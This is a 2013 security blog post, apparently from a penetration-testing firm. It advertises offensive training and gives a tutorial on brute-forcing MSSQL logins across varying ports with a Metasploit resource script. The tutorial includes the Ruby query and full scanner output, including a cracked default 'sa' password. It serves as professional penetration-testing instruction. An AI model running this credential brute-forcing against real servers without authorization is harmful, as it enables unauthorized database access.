Thursday, January 3, 2013

Training Opportunities

We are hosting two training's at the Attack Research Headquarters over the next few months. The first training is our Operational Post Exploitation class which will be January 29th-January 30th.

We have just added Offensive Techniques in February for an available training as well. We will be hosting the training February 26th-February 28th.  More details can be found at our training website.

We are also looking at doing a round of training in the London area in May of this year. Right now we are trying to gauge the interest in this location. If you are interested in taking either Offensive Techniques or Rapid Reverse Engineering in this are please email training@attackresearch.com so that we can gauge interest.

Happy New Year

MSSQL Brute forcing with Resource Scripts

Problem:
How can we brute force MSSQL servers that listen on several different ports without having to manually change the RPORT?

*MSF Pro/Express handle this for you using the database.

Possible Solution:

Use a resource script to populate the values for us.

This will work but we have to get the data in there.

1. Set up the database for metasploit

2. Get a list of servers

OSQL -L

Servers: 
    SEVERNAME1\SQL2000
    SEVERNAME2\SQL2005


OSQL will give you a list of hostnames, we need to turn these hostnames into IP addresses/ranges for mssql_ping.

You can use post/windows/recon/resolve_hostname to a list of hostnames and turn these into IP addresses.


msf  post(resolve_hostname) > run

[*] www.google.com resolves to 173.194.73.106
[*] www.example.com resolves to 192.0.43.10
[-] Failed to resolve test.local
[*] DC1 resolves to 172.16.10.10
[*] SEVERNAME1 resolves to 192.168.237.197
[*] SEVERNAME2 resolves to 192.168.237.211
[*] Post module execution completed


with a list of IP addresses...do mssql_ping


msf  auxiliary(mssql_ping) > run
[*] SQL Server information for 192.168.237.197:
[+]    InstanceName    = MSSQLSERVER
[+]    IsClustered     = No
[+]    tcp             = 1433
[+]    np              = \\servername1\pipe\sql\query
[+]    Version         = 8.00.194
[+]    ServerName      = SEVERNAME1
[*] SQL Server information for 192.168.237.211:
[+]    InstanceName    = INSTANCE1
[+]    IsClustered     = Yes
[+]    tcp             = 2261
[+]    np              = \\servername2\pipe\MSSQL$INSTANCE1\sql\query
[+]    Version         = 10.50.1600.1
[+]    ServerName      = SEVERNAME2


Now we can pull tcp ports out using the db query use the resource script to set the RHOST and RPORT for you per entry. weeeeeee

the query:

begin
framework.db.services.each do |service|
if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp')
hosts << {'ip' => service.host.address, 'port' => service.port}
end
end

We can use that query to populate stuff on the fly for us.

example:


[*] Processing mssql_brute.rb for ERB directives.
[*]resource (mssql_brute.rb)> Ruby Code (932 bytes)
USERPASS_FILE => /opt/framework/mssql2.txt
RHOSTS => 192.168.237.197
RPORT => 1433
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.197:1433 - MSSQL - Starting authentication scanner.
[*]192.168.237.197:1433 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.197:1433 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.197:1433 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.197:1433 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.197:1433 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[-]192.168.237.197:1433 MSSQL - [5/6] - failed to login as 'sa'
[*]192.168.237.197:1433 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.197:1433 MSSQL - [6/6] - failed to login as 'sa'

RHOSTS => 192.168.237.211
RPORT => 2261
BRUTEFORCE_SPEED => 2
BLANK_PASSWORDS => false
USER_AS_PASS => false

[*]192.168.237.211:2261 - MSSQL - Starting authentication scanner.
[*]192.168.237.211:2261 MSSQL - [1/6] - Trying username:'sa' with password:''
[-]192.168.237.211:2261 MSSQL - [1/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [2/6] - Trying username:'sa' with password:'sa'
[-]192.168.237.211:2261 MSSQL - [2/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [3/6] - Trying username:'sa' with password:'password'
[-]192.168.237.211:2261 MSSQL - [3/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [4/6] - Trying username:'sa' with password:'sql'
[-]192.168.237.211:2261 MSSQL - [4/6] - failed to login as 'sa'
[*]192.168.237.211:2261 MSSQL - [5/6] - Trying username:'sa' with password:'database'
[+]192.168.237.211:2261 - MSSQL - successful login 'sa' : 'database'
[*]192.168.237.211:2261 MSSQL - [6/6] - Trying username:'sa' with password:'mssql'
[-]192.168.237.211:2261 MSSQL - [6/6] - failed to login as 'sa'
[*]Scanned 1 of 1 hosts (100% complete)
[*]Auxiliary module execution completed


code is available here:
https://github.com/carnal0wnage/Metasploit-Code/blob/master/scripts/resource/mssql_brute.rb

lots of other resource scripts are in the scripts/resources directory in your msf install.
https://github.com/rapid7/metasploit-framework/tree/master/scripts/resource


UPDATE 4 Jan 2013:
merged into metasploit trunk
https://github.com/rapid7/metasploit-framework/pull/1234